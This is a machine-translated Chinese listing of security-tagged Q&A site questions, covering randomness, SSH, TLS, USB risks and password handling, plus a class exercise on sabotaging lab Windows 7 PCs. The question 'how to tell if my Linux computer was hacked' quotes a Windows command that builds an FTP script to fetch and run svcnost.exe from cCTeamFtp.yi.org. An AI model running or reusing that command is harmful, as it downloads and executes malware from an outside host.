Questions tagged «security»

保护计算机系统和信息免受诸如盗窃或破坏数据之类的威胁。

18
伪随机数和真正的随机数有何不同?为何如此重要?
我从来没有得到这个。只是说您用任何语言编写了一个小程序,都会掷骰子(仅以骰子为例)。经过60万次滚动,每个数字将被滚动100,000次左右,这是我所期望的。 为什么会有专门针对“真正随机性”的网站?当然,根据上述观察,获得任意数字的机会几乎等于可以选择多少个数字。 我在Python中尝试过:这是6000万次滚动的结果。最高变化约为0.15。这不是随机的吗? 1 - 9997653 2347.0 2 - 9997789 2211.0 3 - 9996853 3147.0 4 - 10006533 -6533.0 5 - 10002774 -2774.0 6 - 9998398 1602.0

12
如何给妻子紧急访问登录名,密码等?
我是家里的数字大师。我的妻子擅长于电子邮件和论坛网站,但她信任我所有重要的数字资料,包括网上银行和其他需要密码的内容;以及家庭照片以及现代家庭中大量其他数字事物。我们讨论相关的动作,但执行动作的始终是我。 如果我突然丧失工作能力,那么我的妻子将彻底陷入困境:她不知道我们计算机上的数字内容是什么,如何访问它,我们拥有哪些在线帐户以及他们的登录凭据是什么。这也会使我的许多公开露面(个人网站,电子邮件帐户,社交网络等)无法解决。 使事情复杂化的是,我是谁到处都不使用相同密码的人之一。我会混合使用SuperGenPass和LastPass,并尽可能使用两因素身份验证。我没有太多的希望,她会通过的所有书面说明找到她的方式是在紧张的情况。 我只能告诉她,她应该问我的精通技术的孪生兄弟,然后将我的LastPass主密码短语交给他。我认为这将有很大的成功机会,但这很不雅致,我的妻子无法控制这些信息。 如何确保我的妻子可以使用我的数字遗体? 更新: 非常感谢您所做的所有巨大贡献。我学到了很多!现在我只需要决定 :-)

27
如何弄乱运行Windows 7的PC?[关闭]
好的,因此对于我的PC班,我必须找到3个会弄乱实验室PC的黑客。我和我的搭档将PC弄乱,然后另一个团队将尝试对其进行修复。它的系统是Windows7。任何会停止正常使用或使PC失效的事情。条件: 无法打开外壳 无法使用注册表设置(由于注册表设置太大,其他团队需要很长时间才能解决) 需要在15到30分钟内(由我的老师(最好不要由其他团队提供))是可修复的(意思是,没有什么会导致严重问题,因此需要重新安装) 可以使用管理工具 没有下载(PC甚至没有连接到网络) 注意:通过获取桌面的屏幕快照并将其设置为背景来创建假的,不可点击的桌面之类的操作将无法正常工作,因为已经讨论过了。还讨论了创建重新启动链接并将其放入自动启动程序的问题。但是,任何这种类型的声音都很好听。 有什么建议么? PS这真的是我上大学的课,所以这里没有害处,只是纯粹的实验室乐趣:) 编辑后添加:首先要感谢大家的输入,这里有一些很棒的想法。为了澄清一些事情:-我有管理员帐户-需要在15分钟内完成,需要在15-30分钟内修复-无法将其连接到任何网络,因为它是实验室PC而大学不允许他们。 @Billare,是的,我们的老师内心深处是黑客:) 哦,顺便说一句,我认为我们不允许从另一种介质引导或与BIOS混淆,它是Desktop Systems Administration类,并且所有操作都需要在Windows内完成。我将询问并查看是否允许,如果可以,那么我可以在这里使用一些想法。再次感谢大家。 编辑2:让我们尝试一个不同的角度。如何禁用一些非重要的服务会引起一些麻烦。要点是,从开始使用PC开始就需要痛苦,而不是长期使用。哇,我的脑海里浮现出一些想法,太棒了,今晚会让您知道我的用意。 主持人注意:如果您建议禁用/损坏计算机的方法,请立即提供有关如何修复损坏的信息的信息(如果不是显而易见的话)。 无法解释其工作方式或作用的单线回答将转换为注释。

12
如何修复有关ECDSA主机密钥的警告
我正在尝试使用设置Ubuntu服务器上的无密码SSH ssh-copy-id myuser@myserver,但出现错误: 警告:“ myserver”的ECDSA主机密钥与IP地址“ 192.168.1.123”的密钥不同 是什么原因造成的,如何解决?我尝试删除.ssh远程计算机上的目录,并在ssh-keygen -R "myserver"本地运行,但这不能解决错误。

20
如何列出特定网站提供的SSL / TLS密码套件?
如何检索特定网站提供的SSL / TLS密码套件的列表? 我已经尝试过openssl,但是如果您检查输出: $ echo -n | openssl s_client -connect www.google.com:443 CONNECTED(00000003) depth=1 /C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA verify error:num=20:unable to get local issuer certificate verify return:0 --- Certificate chain 0 s:/C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com i:/C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA 1 s:/C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA i:/C=US/O=VeriSign, …
261 security  ssl  tls 

15
如何可靠地保持SSH隧道打开?
我下班时使用SSH隧道来绕过各种隐性防火墙(我的老板没关系:))。问题是,一段时间后,ssh连接通常会挂起,并且隧道断开。 如果我至少可以自动监视隧道,则可以在挂起隧道时重新启动它,但我什至没有想办法。 可以告诉我如何防止ssh连接挂起的用户的加分点,当然!

15
“此文件来自另一台计算机...”-如何取消阻止文件夹中的所有文件而不必分别取消阻止它们?
Windows XP SP2和Windows Vista具有这种处理方式,其中区域信息保留在已下载文件的NTFS分区中,因此它会阻止某些应用程序中的某些文件,直到您“取消阻止”这些文件为止。 因此,例如,如果您下载源代码的zip文件进行尝试,则每个文件都会在文件属性的安全设置中显示该文件 “此文件来自另一台计算机,可能被阻止以帮助保护此计算机” 以及“取消阻止”按钮。某些程序不在乎,但Visual Studio将拒绝在解决方案中加载项目,直到它们被解除阻止为止。 虽然转到每个项目文件并分别解除阻止并不十分困难,但这是一个痛苦。而且它似乎没有显示您可以同时取消阻止多个选定的文件。 有什么方法可以取消阻止目录中的所有文件,而不必单独访问它们? 我知道您可以全局关闭所有新文件的功能,但是我不想这样做
186 windows  security  ntfs 


5
Linux如何知道新密码与前一个密码相似?
几次我试图在各种Linux机器上更改用户密码,但是当新密码与旧密码相似时,操作系统抱怨它们太相似了。 我一直想知道,系统如何知道这一点?我以为密码另存为哈希。这是否意味着当系统能够比较新密码的相似性时,旧密码实际上被保存为纯文本吗?
145 linux  unix  security 


3
为什么我的浏览器认为https://1.1.1.1是安全的?
当我访问https://1.1.1.1时,我使用的任何Web浏览器都认为该URL是安全的。 这是Google Chrome显示的内容: 通常,当我尝试通过其IP地址访问HTTPS站点时,会收到如下安全警告: 据我了解,站点证书需要与域匹配,但是Google Chrome证书查看器不会显示1.1.1.1: GoDaddy的知识库文章“我可以为Intranet名称或IP地址申请证书吗?” 说: 否-我们不再接受内部网名称或IP地址的证书请求。这是一种行业标准,不是GoDaddy特有的标准。 (重点是我的) 并且: 因此,自2016年10月1日起,证书颁发机构(CA)必须吊销使用 Intranet名称或IP地址的SSL证书。 (重点是我的) 和: 除了保护IP地址和Intranet名称之外,您应该将服务器重新配置为使用完全合格的域名(FQDN),例如www.coolexample.com。 (重点是我的) 强制性撤销日期早于2016年10月01日,但证书1.1.1.1已于2018年3月29日签发(如上图所示)。 所有主要浏览器如何可能认为https://1.1.1.1是受信任的HTTPS网站?

9
插入和浏览不受信任的USB驱动器有什么危险?
假设有人要我将一些文件复制到他们的USB记忆棒中。我正在运行禁用自动运行功能的完整Windows 7 x64(通过组策略)。我插入USB驱动器,在Windows资源管理器中将其打开,然后将一些文件复制到其中。我没有运行或查看任何现有文件。如果我这样做会发生什么不好的事情? 如果我在Linux(例如Ubuntu)上执行此操作怎么办? 请注意,我在寻找细节的特定风险(如果有的话),而不是“这将是安全的,如果你不这样做”。

6
如何在命令行上密码保护gzip文件?
我想在Ubuntu 10.04上使用tar命令创建一些tar.gz(可能还有tar.bz2)文件。 我想用密码保护文件。 执行此操作的命令是什么(我已经使用Google搜索过,但是没有发现任何显示如何使用密码创建和提取压缩文件的命令)。 有人知道该怎么做吗?
130 ubuntu  security  tar  gzip  bzip2 

5
如何确定我的Linux计算机是否被黑客入侵?
我的家用PC通常是打开的,但显示器却关闭了。今天傍晚,我下班回家后,发现了一次看上去很像黑客尝试的事情:在我的浏览器中,我的Gmail已打开(就是我),但是它处于撰写模式,并且该TO字段中包含以下内容: md / c echo open cCTeamFtp.yi.org 21 >> ik&echo用户ccteam10 765824 >> ik&echo二进制文件>> ik&echo get svcnost.exe >> ik&echo bye >> ik&ftp -n -v -s:ik&del ik &svcnost.exe&exit echo您已拥有 在我看来,这看起来像Windows命令行代码,并且代码的md开头加上Gmail处于撰写模式这一事实,很明显表明有人试图运行cmd命令。我猜我很幸运,实际上我没有在此PC上运行Windows,但是我有其他人可以运行。这是我第一次发生这样的事情。我不是Linux专家,当时我没有运行除Firefox之外的任何其他程序。 我绝对确定我没有写这个,并且没有人在我的电脑前。另外,我最近将自己的Google密码(以及所有其他密码)更改为类似的密码,vMA8ogd7bv所以我认为没有人入侵了我的Google帐户。 刚刚发生了什么?当不是老太婆运行恶意软件的老Windows计算机而不是最近安装的新Ubuntu时,有人如何在我的计算机上敲击键盘? 更新: 让我解决一些要点和问题: 我在奥地利的乡下。我的WLAN路由器运行WPA2 / PSK以及不在词典中的中等强度密码。必须是蛮力的,距离这里不到50米;它不太可能被黑客入侵。 我使用的是USB有线键盘,因此再也不太可能有人可以入侵它。 当时我没有使用计算机。我在工作时只是在家里闲逛。这是一台安装在显示器上的台式计算机,因此我很少关闭它。 这台机器只有两个月大,只能运行Ubuntu,而且我没有使用奇怪的软件或访问奇怪的网站。主要是Stack Exchange,Gmail和报纸。没有游戏。Ubuntu将保持最新状态。 我不知道正在运行任何VNC服务;我当然还没有安装或启用它。我也没有启动任何其他服务器。我不确定默认情况下是否在Ubuntu中运行任何程序吗? 我知道Gmail帐户活动中的所有IP地址。我相当确定Google不是入门工具。 我找到了“ 日志文件查看器”,但不知道要查找什么。救命? 我真正想知道的是,真正让我感到不安全的是:互联网上的任何人如何在我的计算机上生成击键?我如何才能避免这种情况,而不必全神贯注呢?我不是Linux极客,而是父亲,他对Windows迷恋了20多年,对它感到厌倦。在过去的18年多的在线时间里,我从未亲自看到过任何黑客尝试,因此这对我来说是新的。
128 linux  security 


By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.